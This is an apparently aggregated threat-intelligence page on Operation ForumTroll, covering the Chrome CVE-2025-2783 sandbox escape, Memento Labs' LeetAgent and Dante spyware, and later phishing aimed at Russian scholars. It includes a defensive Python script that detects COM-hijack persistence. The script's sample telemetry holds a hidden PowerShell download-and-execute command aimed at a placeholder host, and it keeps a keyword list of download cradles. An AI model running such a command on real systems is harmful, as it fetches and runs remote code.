Memento Labs linked to Chrome zero-day exploitation in Operation ForumTroll
Summary
Operation ForumTroll, discovered in March 2025, targeted Russian organizations and individuals using a zero-day vulnerability in Google Chrome (CVE-2025-2783). The campaign, also tracked as TaxOff/Team 46 by Positive Technologies and Prosperous Werewolf by BI.ZONE, delivered malware linked to the Italian spyware vendor Memento Labs. The attacks used phishing emails with malicious links to infect victims, targeting media outlets, universities, research centers, government organizations, financial institutions, and other organizations in Russia and Belarus. The malware, identified as LeetAgent and Dante, was used to steal data and maintain persistence on compromised systems. Memento Labs, formed after InTheCyber Group acquired Hacking Team, presented its Dante spyware at a conference in 2023. The malware was used in attacks dating back to at least 2022. The attacks involved sophisticated techniques to ensure only targeted victims were compromised. The zero-day vulnerability (CVE-2025-2783) was discovered and reported to Google by researchers at Kaspersky Lab earlier in 2025. The exploit bypassed Chrome's sandbox protections by exploiting a logic vulnerability in Chrome caused by an obscure quirk in the Windows OS. The exploit used pseudo handles to disable sandbox functionality, allowing unauthorized access to privileged processes. The exploit represents a new class of vulnerabilities that could affect other applications and Windows services. The group known as Mem3nt0 mori, also referred to as ForumTroll APT, is linked to Operation ForumTroll. The attacks began in March 2025 with highly personalized phishing emails inviting victims to the Primakov Readings forum. The flaw in Chrome stemmed from a logical oversight in Windows' handling of pseudo handles, allowing attackers to execute code in Chrome's browser process. Google patched the issue in version 134.0.6998.177/.178. Firefox developers found a related issue in their browser, addressed as CVE-2025-2857. 
Kaspersky's researchers concluded that Mem3nt0 mori leveraged Dante-based components in the ForumTroll campaign, marking the first observed use of this commercial spyware in the wild. The discovery underscores ongoing risks from state-aligned and commercial surveillance vendors. Kaspersky urged security researchers to examine other software and Windows services for similar pseudo-handle vulnerabilities. In a new wave of attacks detected in October 2025, the threat actor targeted individuals in Russia, specifically scholars in political science, international relations, and global economics, working at major Russian universities and research institutions. The latest attack wave used emails claiming to be from eLibrary, a Russian scientific electronic library, with messages sent from the address 'support@e-library[.]wiki'. The domain was registered in March 2025, six months before the start of the campaign, indicating preparations for the attack had been underway for some time. The emails contained links to a malicious site to download a plagiarism report, which, when clicked, downloaded a ZIP archive named with the victim's last name, first name, and patronymic. The links were designed for one-time use, displaying a Russian language message stating 'Download failed, please try again later' if accessed more than once. The archive contained a Windows shortcut (LNK) that, when executed, ran a PowerShell script to download and launch a PowerShell-based payload from a remote server. The payload contacted a URL to fetch a final-stage DLL and persist it using COM hijacking, also downloading and displaying a decoy PDF to the victim. The final payload was a command-and-control (C2) and red teaming framework known as Tuoni, enabling remote access to the victim's Windows device. ForumTroll has been targeting organizations and individuals in Russia and Belarus since at least 2022.
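The December wave described above chains an LNK in a ZIP, a PowerShell stager, a downloaded DLL and COM-hijacking persistence. As an added illustration (not code from Kaspersky, Tuoni, or any of the cited articles), the following Python correlates constructed, Sysmon-style process-creation and registry events to flag that persistence step: a PowerShell process whose parent is explorer.exe (what a double-clicked LNK looks like in telemetry) that then writes a per-user CLSID InprocServer32 value. The `key=value|key=value` record format, hosts, SIDs, CLSIDs, paths and URLs are all made-up placeholders.

```python
import re
from typing import Dict, List, Optional, Tuple

# Per-user COM class registration. Windows resolves HKCU\Software\Classes before
# HKLM, so a user-writable InprocServer32 pointing at a dropped DLL gets loaded
# whenever a legitimate process instantiates that CLSID (COM hijacking).
PER_USER_INPROC = re.compile(
    r"^HKU\\S-1-5-21-[\d-]+\\Software\\Classes\\CLSID\\\{[0-9a-f-]{36}\}\\InprocServer32$",
    re.IGNORECASE,
)

# Download-cradle fragments common to PowerShell stagers; deliberately broad, tune locally.
DOWNLOAD_CUES = ("downloadstring", "downloadfile", "invoke-webrequest",
                 "net.webclient", "invoke-expression", "iex ")


def parse_event(line: str) -> Dict[str, str]:
    """Parse one constructed 'key=value|key=value' telemetry record."""
    fields: Dict[str, str] = {}
    for part in line.split("|"):
        name, _, value = part.partition("=")
        fields[name.strip().lower()] = value.strip()
    return fields


def basename(image: str) -> str:
    return image.lower().rsplit("\\", 1)[-1]


def is_powershell(image: str) -> bool:
    return basename(image) in ("powershell.exe", "pwsh.exe")


def has_download_cue(cmdline: str) -> bool:
    low = cmdline.lower()
    return any(cue in low for cue in DOWNLOAD_CUES)


def classify(writer: Optional[Dict[str, str]]) -> Tuple[str, str]:
    """Map the registry writer's process context to (rule, severity)."""
    if writer is None:
        return "com_hijack_candidate", "medium"   # writer never seen in process telemetry
    if not is_powershell(writer.get("image", "")):
        return "com_hijack_candidate", "low"      # installers register per-user COM legitimately
    # explorer.exe parent (LNK launched by the user) plus a download cradle in the
    # command line is the chain the campaign summary describes.
    if basename(writer.get("parent", "")) == "explorer.exe" and has_download_cue(writer.get("cmdline", "")):
        return "forumtroll_like_chain", "high"
    return "com_hijack_by_scripting_host", "medium"


def detect_chain(lines: List[str]) -> List[Dict[str, str]]:
    """Correlate process-creation and registry-set events per (host, pid)."""
    procs: Dict[Tuple[str, str], Dict[str, str]] = {}
    findings: List[Dict[str, str]] = []
    for line in lines:
        ev = parse_event(line)
        ident = (ev.get("host", ""), ev.get("pid", ""))
        if ev.get("type") == "process":
            procs[ident] = ev
        elif ev.get("type") == "registry" and PER_USER_INPROC.match(ev.get("key", "")):
            writer = procs.get(ident)
            rule, severity = classify(writer)
            findings.append({
                "rule": rule, "severity": severity, "host": ident[0], "pid": ident[1],
                "registry_key": ev["key"], "dll": ev.get("value", ""),
                "writer_cmdline": writer.get("cmdline", "") if writer else "",
            })
    return findings


# Constructed sample telemetry; every host, SID, CLSID, path and URL is a placeholder.
SAMPLE_EVENTS = [
    # 1. PowerShell stager spawned by explorer.exe (user opened the LNK from the ZIP)
    r"type=process|host=WS01|pid=4120|parent=C:\Windows\explorer.exe"
    r"|image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r'|cmdline=powershell.exe -w hidden -ep bypass -c "IEX ((New-Object Net.WebClient).DownloadString(https://stager.example.invalid/s))"',
    # 2. The same process persists the final-stage DLL through a per-user CLSID
    r"type=registry|host=WS01|pid=4120"
    r"|key=HKU\S-1-5-21-1111-2222-3333-1001\Software\Classes\CLSID\{00000000-0000-0000-0000-000000000000}\InprocServer32"
    r"|value=C:\Users\user\AppData\Roaming\Vendor\final.dll",
    # 3. Benign PowerShell from explorer.exe: no download cradle, no registry write
    r"type=process|host=WS01|pid=5210|parent=C:\Windows\explorer.exe"
    r"|image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|cmdline=powershell.exe -c Get-Help Get-Process",
    # 4. Machine-wide registration by an installer: HKLM, not the per-user hive
    r"type=registry|host=WS02|pid=700"
    r"|key=HKLM\Software\Classes\CLSID\{11111111-1111-1111-1111-111111111111}\InprocServer32"
    r"|value=C:\Program Files\Vendor\vendor.dll",
    # 5. Per-user InprocServer32 write with no matching process-creation event
    r"type=registry|host=WS03|pid=9001"
    r"|key=HKU\S-1-5-21-4444-5555-6666-1002\Software\Classes\CLSID\{22222222-2222-2222-2222-222222222222}\InprocServer32"
    r"|value=C:\Users\user\AppData\Local\Temp\loader.dll",
]

if __name__ == "__main__":
    for f in detect_chain(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['rule']} host={f['host']} pid={f['pid']} dll={f['dll']}")
```

On the sample input the WS01 pair is reported as a high-severity chain and the WS03 write as a medium-severity candidate; the HKLM registration is ignored.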
Timeline
- 27.10.2025 18:37 (5 articles)
Memento Labs linked to Chrome zero-day exploitation in Operation ForumTroll
Sources:
- Italian spyware vendor linked to Chrome zero-day attacks — www.bleepingcomputer.com — 27.10.2025 18:37
- Memento Spyware Tied to Chrome Zero-Day Attacks — www.darkreading.com — 27.10.2025 22:02
- Chrome Zero-Day Exploited to Deliver Italian Memento Labs' LeetAgent Spyware — thehackernews.com — 28.10.2025 10:22
- Chrome Zero-Day Actively Exploited in Attacks by Mem3nt0 mori — www.infosecurity-magazine.com — 28.10.2025 18:00
- New ForumTroll Phishing Attacks Target Russian Scholars Using Fake eLibrary Emails — thehackernews.com — 17.12.2025 16:54
Information Snippets
- Operation ForumTroll targeted Russian organizations, including media outlets, universities, research centers, government organizations, and financial institutions.
  First reported: 27.10.2025 18:37 (4 sources, 4 articles). Sources:
  - Italian spyware vendor linked to Chrome zero-day attacks — www.bleepingcomputer.com — 27.10.2025 18:37
  - Memento Spyware Tied to Chrome Zero-Day Attacks — www.darkreading.com — 27.10.2025 22:02
  - Chrome Zero-Day Exploited to Deliver Italian Memento Labs' LeetAgent Spyware — thehackernews.com — 28.10.2025 10:22
  - Chrome Zero-Day Actively Exploited in Attacks by Mem3nt0 mori — www.infosecurity-magazine.com — 28.10.2025 18:00
- The campaign exploited a zero-day vulnerability in Google Chrome (CVE-2025-2783) to deliver malware.
  First reported: 27.10.2025 18:37 (4 sources, 4 articles). Sources:
  - Italian spyware vendor linked to Chrome zero-day attacks — www.bleepingcomputer.com — 27.10.2025 18:37
  - Memento Spyware Tied to Chrome Zero-Day Attacks — www.darkreading.com — 27.10.2025 22:02
  - Chrome Zero-Day Exploited to Deliver Italian Memento Labs' LeetAgent Spyware — thehackernews.com — 28.10.2025 10:22
  - Chrome Zero-Day Actively Exploited in Attacks by Mem3nt0 mori — www.infosecurity-magazine.com — 28.10.2025 18:00
- The malware used in Operation ForumTroll was linked to Memento Labs, an Italian spyware vendor.
  First reported: 27.10.2025 18:37 (4 sources, 4 articles). Sources:
  - Italian spyware vendor linked to Chrome zero-day attacks — www.bleepingcomputer.com — 27.10.2025 18:37
  - Memento Spyware Tied to Chrome Zero-Day Attacks — www.darkreading.com — 27.10.2025 22:02
  - Chrome Zero-Day Exploited to Deliver Italian Memento Labs' LeetAgent Spyware — thehackernews.com — 28.10.2025 10:22
  - Chrome Zero-Day Actively Exploited in Attacks by Mem3nt0 mori — www.infosecurity-magazine.com — 28.10.2025 18:00
- Memento Labs is a successor to Hacking Team, known for its Remote Control System (RCS) surveillance tool.
  First reported: 27.10.2025 18:37 (4 sources, 4 articles). Sources:
  - Italian spyware vendor linked to Chrome zero-day attacks — www.bleepingcomputer.com — 27.10.2025 18:37
  - Memento Spyware Tied to Chrome Zero-Day Attacks — www.darkreading.com — 27.10.2025 22:02
  - Chrome Zero-Day Exploited to Deliver Italian Memento Labs' LeetAgent Spyware — thehackernews.com — 28.10.2025 10:22
  - Chrome Zero-Day Actively Exploited in Attacks by Mem3nt0 mori — www.infosecurity-magazine.com — 28.10.2025 18:00
- The malware, identified as LeetAgent and Dante, was used to steal data and maintain persistence on compromised systems.
  First reported: 27.10.2025 18:37 (4 sources, 5 articles). Sources:
  - Italian spyware vendor linked to Chrome zero-day attacks — www.bleepingcomputer.com — 27.10.2025 18:37
  - Memento Spyware Tied to Chrome Zero-Day Attacks — www.darkreading.com — 27.10.2025 22:02
  - Chrome Zero-Day Exploited to Deliver Italian Memento Labs' LeetAgent Spyware — thehackernews.com — 28.10.2025 10:22
  - Chrome Zero-Day Actively Exploited in Attacks by Mem3nt0 mori — www.infosecurity-magazine.com — 28.10.2025 18:00
  - New ForumTroll Phishing Attacks Target Russian Scholars Using Fake eLibrary Emails — thehackernews.com — 17.12.2025 16:54
- LeetAgent is a modular spyware that supports command execution, file operations, keylogging, and data theft.
  First reported: 27.10.2025 18:37 (4 sources, 4 articles). Sources:
  - Italian spyware vendor linked to Chrome zero-day attacks — www.bleepingcomputer.com — 27.10.2025 18:37
  - Memento Spyware Tied to Chrome Zero-Day Attacks — www.darkreading.com — 27.10.2025 22:02
  - Chrome Zero-Day Exploited to Deliver Italian Memento Labs' LeetAgent Spyware — thehackernews.com — 28.10.2025 10:22
  - Chrome Zero-Day Actively Exploited in Attacks by Mem3nt0 mori — www.infosecurity-magazine.com — 28.10.2025 18:00
- Dante is a modular spyware that retrieves components from a command-and-control (C2) server and deletes itself if no communication is received from the attacker's server for a specified number of days.
  First reported: 27.10.2025 18:37 (4 sources, 4 articles). Sources:
  - Italian spyware vendor linked to Chrome zero-day attacks — www.bleepingcomputer.com — 27.10.2025 18:37
  - Memento Spyware Tied to Chrome Zero-Day Attacks — www.darkreading.com — 27.10.2025 22:02
  - Chrome Zero-Day Exploited to Deliver Italian Memento Labs' LeetAgent Spyware — thehackernews.com — 28.10.2025 10:22
  - Chrome Zero-Day Actively Exploited in Attacks by Mem3nt0 mori — www.infosecurity-magazine.com — 28.10.2025 18:00
- The attacks involved phishing emails with malicious links to infect victims.
  First reported: 27.10.2025 18:37 (4 sources, 5 articles). Sources:
  - Italian spyware vendor linked to Chrome zero-day attacks — www.bleepingcomputer.com — 27.10.2025 18:37
  - Memento Spyware Tied to Chrome Zero-Day Attacks — www.darkreading.com — 27.10.2025 22:02
  - Chrome Zero-Day Exploited to Deliver Italian Memento Labs' LeetAgent Spyware — thehackernews.com — 28.10.2025 10:22
  - Chrome Zero-Day Actively Exploited in Attacks by Mem3nt0 mori — www.infosecurity-magazine.com — 28.10.2025 18:00
  - New ForumTroll Phishing Attacks Target Russian Scholars Using Fake eLibrary Emails — thehackernews.com — 17.12.2025 16:54
- The zero-day vulnerability (CVE-2025-2783) was discovered and reported to Google by researchers at Kaspersky Lab earlier in 2025.
  First reported: 27.10.2025 22:02 (3 sources, 3 articles). Sources:
  - Memento Spyware Tied to Chrome Zero-Day Attacks — www.darkreading.com — 27.10.2025 22:02
  - Chrome Zero-Day Exploited to Deliver Italian Memento Labs' LeetAgent Spyware — thehackernews.com — 28.10.2025 10:22
  - Chrome Zero-Day Actively Exploited in Attacks by Mem3nt0 mori — www.infosecurity-magazine.com — 28.10.2025 18:00
- The exploit bypassed Chrome's sandbox protections by exploiting a logic vulnerability in Chrome caused by an obscure quirk in the Windows OS.
  First reported: 27.10.2025 22:02 (3 sources, 3 articles). Sources:
  - Memento Spyware Tied to Chrome Zero-Day Attacks — www.darkreading.com — 27.10.2025 22:02
  - Chrome Zero-Day Exploited to Deliver Italian Memento Labs' LeetAgent Spyware — thehackernews.com — 28.10.2025 10:22
  - Chrome Zero-Day Actively Exploited in Attacks by Mem3nt0 mori — www.infosecurity-magazine.com — 28.10.2025 18:00
- The exploit used pseudo handles to disable sandbox functionality, allowing unauthorized access to privileged processes.
  First reported: 27.10.2025 22:02 (3 sources, 3 articles). Sources:
  - Memento Spyware Tied to Chrome Zero-Day Attacks — www.darkreading.com — 27.10.2025 22:02
  - Chrome Zero-Day Exploited to Deliver Italian Memento Labs' LeetAgent Spyware — thehackernews.com — 28.10.2025 10:22
  - Chrome Zero-Day Actively Exploited in Attacks by Mem3nt0 mori — www.infosecurity-magazine.com — 28.10.2025 18:00
- The exploit represents a new class of vulnerabilities that could affect other applications and Windows services.
  First reported: 27.10.2025 22:02 (3 sources, 3 articles). Sources:
  - Memento Spyware Tied to Chrome Zero-Day Attacks — www.darkreading.com — 27.10.2025 22:02
  - Chrome Zero-Day Exploited to Deliver Italian Memento Labs' LeetAgent Spyware — thehackernews.com — 28.10.2025 10:22
  - Chrome Zero-Day Actively Exploited in Attacks by Mem3nt0 mori — www.infosecurity-magazine.com — 28.10.2025 18:00
- The Windows DuplicateHandle API function is considered dangerous when pseudo handles are provided.
  First reported: 27.10.2025 22:02 (3 sources, 3 articles). Sources:
  - Memento Spyware Tied to Chrome Zero-Day Attacks — www.darkreading.com — 27.10.2025 22:02
  - Chrome Zero-Day Exploited to Deliver Italian Memento Labs' LeetAgent Spyware — thehackernews.com — 28.10.2025 10:22
  - Chrome Zero-Day Actively Exploited in Attacks by Mem3nt0 mori — www.infosecurity-magazine.com — 28.10.2025 18:00
- Dante spyware was heavily obfuscated using VMProtect, making reverse engineering difficult but not impossible.
  First reported: 27.10.2025 22:02 (3 sources, 3 articles). Sources:
  - Memento Spyware Tied to Chrome Zero-Day Attacks — www.darkreading.com — 27.10.2025 22:02
  - Chrome Zero-Day Exploited to Deliver Italian Memento Labs' LeetAgent Spyware — thehackernews.com — 28.10.2025 10:22
  - Chrome Zero-Day Actively Exploited in Attacks by Mem3nt0 mori — www.infosecurity-magazine.com — 28.10.2025 18:00
- Dante shares similarities with the original Hacking Team's Remote Control System (RCS) spyware.
  First reported: 27.10.2025 22:02 (3 sources, 3 articles). Sources:
  - Memento Spyware Tied to Chrome Zero-Day Attacks — www.darkreading.com — 27.10.2025 22:02
  - Chrome Zero-Day Exploited to Deliver Italian Memento Labs' LeetAgent Spyware — thehackernews.com — 28.10.2025 10:22
  - Chrome Zero-Day Actively Exploited in Attacks by Mem3nt0 mori — www.infosecurity-magazine.com — 28.10.2025 18:00
- Operation ForumTroll is also tracked as TaxOff/Team 46 by Positive Technologies and Prosperous Werewolf by BI.ZONE.
  First reported: 28.10.2025 10:22 (2 sources, 2 articles). Sources:
  - Chrome Zero-Day Exploited to Deliver Italian Memento Labs' LeetAgent Spyware — thehackernews.com — 28.10.2025 10:22
  - Chrome Zero-Day Actively Exploited in Attacks by Mem3nt0 mori — www.infosecurity-magazine.com — 28.10.2025 18:00
- The campaign has been active since at least February 2024.
  First reported: 28.10.2025 10:22 (1 source, 2 articles). Sources:
  - Chrome Zero-Day Exploited to Deliver Italian Memento Labs' LeetAgent Spyware — thehackernews.com — 28.10.2025 10:22
  - New ForumTroll Phishing Attacks Target Russian Scholars Using Fake eLibrary Emails — thehackernews.com — 17.12.2025 16:54
- The phishing emails contained personalized, short-lived links inviting recipients to the Primakov Readings forum.
  First reported: 28.10.2025 10:22 (2 sources, 2 articles). Sources:
  - Chrome Zero-Day Exploited to Deliver Italian Memento Labs' LeetAgent Spyware — thehackernews.com — 28.10.2025 10:22
  - Chrome Zero-Day Actively Exploited in Attacks by Mem3nt0 mori — www.infosecurity-magazine.com — 28.10.2025 18:00
- The attacks targeted media outlets, universities, research centers, government organizations, financial institutions, and other organizations in Russia and Belarus.
  First reported: 28.10.2025 10:22 (2 sources, 2 articles). Sources:
  - Chrome Zero-Day Exploited to Deliver Italian Memento Labs' LeetAgent Spyware — thehackernews.com — 28.10.2025 10:22
  - Chrome Zero-Day Actively Exploited in Attacks by Mem3nt0 mori — www.infosecurity-magazine.com — 28.10.2025 18:00
- The malware LeetAgent uses leetspeak for its commands.
  First reported: 28.10.2025 10:22 (2 sources, 2 articles). Sources:
  - Chrome Zero-Day Exploited to Deliver Italian Memento Labs' LeetAgent Spyware — thehackernews.com — 28.10.2025 10:22
  - Chrome Zero-Day Actively Exploited in Attacks by Mem3nt0 mori — www.infosecurity-magazine.com — 28.10.2025 18:00
- LeetAgent is capable of connecting to a command-and-control (C2) server over HTTPS and receiving instructions that allow it to perform a wide range of tasks, including command execution, file operations, keylogging, and data theft.
  First reported: 28.10.2025 10:22 (2 sources, 2 articles). Sources:
  - Chrome Zero-Day Exploited to Deliver Italian Memento Labs' LeetAgent Spyware — thehackernews.com — 28.10.2025 10:22
  - Chrome Zero-Day Actively Exploited in Attacks by Mem3nt0 mori — www.infosecurity-magazine.com — 28.10.2025 18:00
- The malware used in the intrusions has been traced back to 2022.
  First reported: 28.10.2025 10:22 (2 sources, 2 articles). Sources:
  - Chrome Zero-Day Exploited to Deliver Italian Memento Labs' LeetAgent Spyware — thehackernews.com — 28.10.2025 10:22
  - Chrome Zero-Day Actively Exploited in Attacks by Mem3nt0 mori — www.infosecurity-magazine.com — 28.10.2025 18:00
- The threat actor is proficient in Russian and familiar with local peculiarities, but mistakes suggest non-native Russian speakers.
  First reported: 28.10.2025 10:22 (2 sources, 2 articles). Sources:
  - Chrome Zero-Day Exploited to Deliver Italian Memento Labs' LeetAgent Spyware — thehackernews.com — 28.10.2025 10:22
  - Chrome Zero-Day Actively Exploited in Attacks by Mem3nt0 mori — www.infosecurity-magazine.com — 28.10.2025 18:00
- Positive Technologies disclosed an identical cluster of activity involving the exploitation of CVE-2025-2783 by a threat actor it tracks as TaxOff to deploy a backdoor called Trinper.
  First reported: 28.10.2025 10:22 (1 source, 1 article). Sources:
  - Chrome Zero-Day Exploited to Deliver Italian Memento Labs' LeetAgent Spyware — thehackernews.com — 28.10.2025 10:22
- The LeetAgent backdoor used in Operation ForumTroll directly launched the more sophisticated Dante spyware in several incidents.
  First reported: 28.10.2025 10:22 (2 sources, 3 articles). Sources:
  - Chrome Zero-Day Exploited to Deliver Italian Memento Labs' LeetAgent Spyware — thehackernews.com — 28.10.2025 10:22
  - Chrome Zero-Day Actively Exploited in Attacks by Mem3nt0 mori — www.infosecurity-magazine.com — 28.10.2025 18:00
  - New ForumTroll Phishing Attacks Target Russian Scholars Using Fake eLibrary Emails — thehackernews.com — 17.12.2025 16:54
- Dante obfuscates control flow, hides imported functions, adds anti-debugging checks, and encrypts nearly every string in the source code.
  First reported: 28.10.2025 10:22 (2 sources, 2 articles). Sources:
  - Chrome Zero-Day Exploited to Deliver Italian Memento Labs' LeetAgent Spyware — thehackernews.com — 28.10.2025 10:22
  - Chrome Zero-Day Actively Exploited in Attacks by Mem3nt0 mori — www.infosecurity-magazine.com — 28.10.2025 18:00
- Dante queries the Windows Event Log for events that may indicate the use of malware analysis tools or virtual machines.
  First reported: 28.10.2025 10:22 (2 sources, 2 articles). Sources:
  - Chrome Zero-Day Exploited to Deliver Italian Memento Labs' LeetAgent Spyware — thehackernews.com — 28.10.2025 10:22
  - Chrome Zero-Day Actively Exploited in Attacks by Mem3nt0 mori — www.infosecurity-magazine.com — 28.10.2025 18:00
- Dante proceeds to launch an orchestrator module that communicates with a C2 server via HTTPS, loads other components, and erases traces of all activity if it doesn't receive commands within a set number of days.
  First reported: 28.10.2025 10:22 (2 sources, 2 articles). Sources:
  - Chrome Zero-Day Exploited to Deliver Italian Memento Labs' LeetAgent Spyware — thehackernews.com — 28.10.2025 10:22
  - Chrome Zero-Day Actively Exploited in Attacks by Mem3nt0 mori — www.infosecurity-magazine.com — 28.10.2025 18:00
- The group known as Mem3nt0 mori, also referred to as ForumTroll APT, is linked to Operation ForumTroll.
  First reported: 28.10.2025 18:00 (2 sources, 2 articles). Sources:
  - Chrome Zero-Day Actively Exploited in Attacks by Mem3nt0 mori — www.infosecurity-magazine.com — 28.10.2025 18:00
  - New ForumTroll Phishing Attacks Target Russian Scholars Using Fake eLibrary Emails — thehackernews.com — 17.12.2025 16:54
- The attacks began in March 2025 with highly personalized phishing emails inviting victims to the Primakov Readings forum.
  First reported: 28.10.2025 18:00 (1 source, 1 article). Sources:
  - Chrome Zero-Day Actively Exploited in Attacks by Mem3nt0 mori — www.infosecurity-magazine.com — 28.10.2025 18:00
- The flaw in Chrome stemmed from a logical oversight in Windows' handling of pseudo handles, allowing attackers to execute code in Chrome's browser process.
  First reported: 28.10.2025 18:00 (1 source, 1 article). Sources:
  - Chrome Zero-Day Actively Exploited in Attacks by Mem3nt0 mori — www.infosecurity-magazine.com — 28.10.2025 18:00
- Google patched the issue in version 134.0.6998.177/.178.
  First reported: 28.10.2025 18:00 (1 source, 1 article). Sources:
  - Chrome Zero-Day Actively Exploited in Attacks by Mem3nt0 mori — www.infosecurity-magazine.com — 28.10.2025 18:00
- Firefox developers found a related issue in their browser, addressed as CVE-2025-2857.
  First reported: 28.10.2025 18:00 (1 source, 1 article). Sources:
  - Chrome Zero-Day Actively Exploited in Attacks by Mem3nt0 mori — www.infosecurity-magazine.com — 28.10.2025 18:00
- Kaspersky's researchers concluded that Mem3nt0 mori leveraged Dante-based components in the ForumTroll campaign, marking the first observed use of this commercial spyware in the wild.
  First reported: 28.10.2025 18:00 (1 source, 1 article). Sources:
  - Chrome Zero-Day Actively Exploited in Attacks by Mem3nt0 mori — www.infosecurity-magazine.com — 28.10.2025 18:00
- The discovery underscores ongoing risks from state-aligned and commercial surveillance vendors.
  First reported: 28.10.2025 18:00 (2 sources, 2 articles). Sources:
  - Chrome Zero-Day Actively Exploited in Attacks by Mem3nt0 mori — www.infosecurity-magazine.com — 28.10.2025 18:00
  - New ForumTroll Phishing Attacks Target Russian Scholars Using Fake eLibrary Emails — thehackernews.com — 17.12.2025 16:54
- Kaspersky urged security researchers to examine other software and Windows services for similar pseudo-handle vulnerabilities.
  First reported: 28.10.2025 18:00 (1 source, 1 article). Sources:
  - Chrome Zero-Day Actively Exploited in Attacks by Mem3nt0 mori — www.infosecurity-magazine.com — 28.10.2025 18:00
- The threat actor linked to Operation ForumTroll targeted individuals in Russia, specifically scholars in political science, international relations, and global economics, working at major Russian universities and research institutions.
  First reported: 17.12.2025 16:54 (1 source, 1 article). Sources:
  - New ForumTroll Phishing Attacks Target Russian Scholars Using Fake eLibrary Emails — thehackernews.com — 17.12.2025 16:54
- The latest attack wave used emails claiming to be from eLibrary, a Russian scientific electronic library, with messages sent from the address 'support@e-library[.]wiki'.
  First reported: 17.12.2025 16:54 (1 source, 1 article). Sources:
  - New ForumTroll Phishing Attacks Target Russian Scholars Using Fake eLibrary Emails — thehackernews.com — 17.12.2025 16:54
- The domain 'e-library[.]wiki' was registered in March 2025, six months before the start of the campaign, indicating preparations for the attack had been underway for some time.
  First reported: 17.12.2025 16:54 (1 source, 1 article). Sources:
  - New ForumTroll Phishing Attacks Target Russian Scholars Using Fake eLibrary Emails — thehackernews.com — 17.12.2025 16:54
- The emails contained links to a malicious site to download a plagiarism report, which, when clicked, downloaded a ZIP archive named with the victim's last name, first name, and patronymic.
  First reported: 17.12.2025 16:54 (1 source, 1 article). Sources:
  - New ForumTroll Phishing Attacks Target Russian Scholars Using Fake eLibrary Emails — thehackernews.com — 17.12.2025 16:54
- The links were designed for one-time use, displaying a Russian-language message stating 'Download failed, please try again later' if accessed more than once.
  First reported: 17.12.2025 16:54 (1 source, 1 article). Sources:
  - New ForumTroll Phishing Attacks Target Russian Scholars Using Fake eLibrary Emails — thehackernews.com — 17.12.2025 16:54
- The archive contained a Windows shortcut (LNK) that, when executed, ran a PowerShell script to download and launch a PowerShell-based payload from a remote server.
  First reported: 17.12.2025 16:54 (1 source, 1 article). Sources:
  - New ForumTroll Phishing Attacks Target Russian Scholars Using Fake eLibrary Emails — thehackernews.com — 17.12.2025 16:54
- The payload contacted a URL to fetch a final-stage DLL and persist it using COM hijacking, also downloading and displaying a decoy PDF to the victim.
  First reported: 17.12.2025 16:54 (1 source, 1 article). Sources:
  - New ForumTroll Phishing Attacks Target Russian Scholars Using Fake eLibrary Emails — thehackernews.com — 17.12.2025 16:54
- The final payload was a command-and-control (C2) and red teaming framework known as Tuoni, enabling remote access to the victim's Windows device.
  First reported: 17.12.2025 16:54 (1 source, 1 article). Sources:
  - New ForumTroll Phishing Attacks Target Russian Scholars Using Fake eLibrary Emails — thehackernews.com — 17.12.2025 16:54
- ForumTroll has been targeting organizations and individuals in Russia and Belarus since at least 2022.
  First reported: 17.12.2025 16:54 (1 source, 1 article). Sources:
  - New ForumTroll Phishing Attacks Target Russian Scholars Using Fake eLibrary Emails — thehackernews.com — 17.12.2025 16:54
Similar Happenings
Eighth Chrome Zero-Day Vulnerability Patched in 2025
Google has released an emergency update to fix a high-severity zero-day vulnerability (466192044) in Chrome, marking the eighth such flaw exploited in attacks in 2025. The vulnerability, a buffer overflow in the ANGLE's Metal renderer, affects Chrome versions for Windows, macOS, and Linux. Google has not disclosed further details, including the CVE ID, as the issue remains under coordination. The flaw could lead to memory corruption, crashes, sensitive information leaks, and arbitrary code execution. Users are advised to update their browsers to versions 143.0.7499.109 for Windows and Linux, and 143.0.7499.110 for macOS. This update also addresses two additional medium-severity vulnerabilities (CVE-2025-14372 and CVE-2025-14373). Additionally, Google has released patches for three new Chrome zero-day vulnerabilities, including a high-severity one for which an exploit is accessible in the wild. The high-severity zero-day is referred to only by Google’s internal tracker ID, 466192044, with no CVE attributed at this stage. The status of the vulnerability is marked as 'Under coordination.' Access to the details of a vulnerability may be kept restricted until a majority of users are updated with a fix.
Predator Spyware Exploits Zero-Click Infection Vector via Malicious Ads
Predator spyware, developed by Intellexa, has been using a zero-click infection mechanism called Aladdin, which infects targets by displaying malicious advertisements. This vector is hidden behind shell companies across multiple countries and leverages the commercial mobile advertising system to deliver malware. The spyware is still operational and actively developed, with additional delivery vectors like Triton targeting Samsung Exynos devices. The infection occurs when a target views a malicious ad, which triggers a redirection to Intellexa’s exploit delivery servers. The ads are served through a complex network of advertising firms, making defense measures challenging. Despite sanctions and investigations, including fines from the Greek Data Protection Authority, Intellexa remains active and prolific in zero-day exploitation. Recent leaks reveal that Intellexa's Predator spyware has been marketed under various names, including Helios, Nova, Green Arrow, and Red Arrow. The spyware exploits multiple zero-day vulnerabilities in Android and iOS devices, and uses frameworks like JSKit for native code execution. Intellexa also has the capability to remotely access the surveillance systems of its customers using TeamViewer. The spyware collects extensive data from targeted devices, including messaging apps, calls, emails, device locations, screenshots, passwords, and other on-device information.
SideWinder Adopts ClickOnce-Based Attack Chain Targeting South Asian Diplomats
SideWinder, a persistent threat actor, has targeted South Asian diplomats with a new campaign. The attacks, conducted from March through September 2025, used spear-phishing emails to deliver malware. The infection chain involved PDF and ClickOnce-based vectors, along with previously documented Microsoft Word exploits. The campaign targeted embassies and organizations in India, Sri Lanka, Pakistan, and Bangladesh. The malware families deployed include ModuleInstaller and StealerBot, which are used to gather sensitive information from compromised hosts. The attacks highlight SideWinder's evolving tactics and their focus on sophisticated evasion techniques and espionage objectives.
PhantomCaptcha Campaign Targets Ukraine Aid Groups
